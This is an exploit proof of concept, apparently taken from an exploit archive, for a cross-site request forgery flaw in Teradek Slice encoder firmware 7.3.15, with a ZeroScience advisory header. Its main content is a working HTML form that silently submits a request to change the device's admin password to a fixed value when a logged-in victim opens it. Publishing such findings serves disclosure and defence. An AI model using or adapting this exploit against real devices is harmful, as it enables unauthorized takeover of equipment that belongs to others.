48 lines
No EOL
1.3 KiB
HTML
48 lines
No EOL
1.3 KiB
HTML
<!--
|
|
|
|
Teradek Slice 7.3.15 CSRF Change Password Exploit
|
|
|
|
|
|
Vendor: Teradek, LLC
|
|
Product web page: https://www.teradek.com
|
|
Affected version: Firmware Version: 7.3.15 (build 31735)
|
|
Hardware Version: 2.1
|
|
|
|
|
|
Summary: Built on the award-winning Cube platform, Slice is a rack mount
|
|
HEVC / H.264 codec designed to fit seamlessly into your broadcast studio.
|
|
Like the Cube, Slice encoders and decoders includes 3G-SDI and HDMI I/O,
|
|
Ethernet and WiFi connectivity, and full duplex IFB.
|
|
|
|
Desc: The application interface allows users to perform certain actions
|
|
via HTTP requests without performing any validity checks to verify the
|
|
requests. This can be exploited to perform certain actions with administrative
|
|
privileges if a logged-in user visits a malicious web site.
|
|
|
|
Tested on: lighttpd/1.4.48
|
|
lighttpd/1.4.31
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2018-5467
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5467.php
|
|
|
|
|
|
02.03.2018
|
|
|
|
-->
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
|
|
<input type="hidden" name="pw1" value="P@ssw0rd" />
|
|
<input type="hidden" name="pw2" value="P@ssw0rd" />
|
|
<input type="hidden" name="user" value="admin" />
|
|
<input type="submit" value="Initiate" />
|
|
</form>
|
|
</body>
|
|
</html> |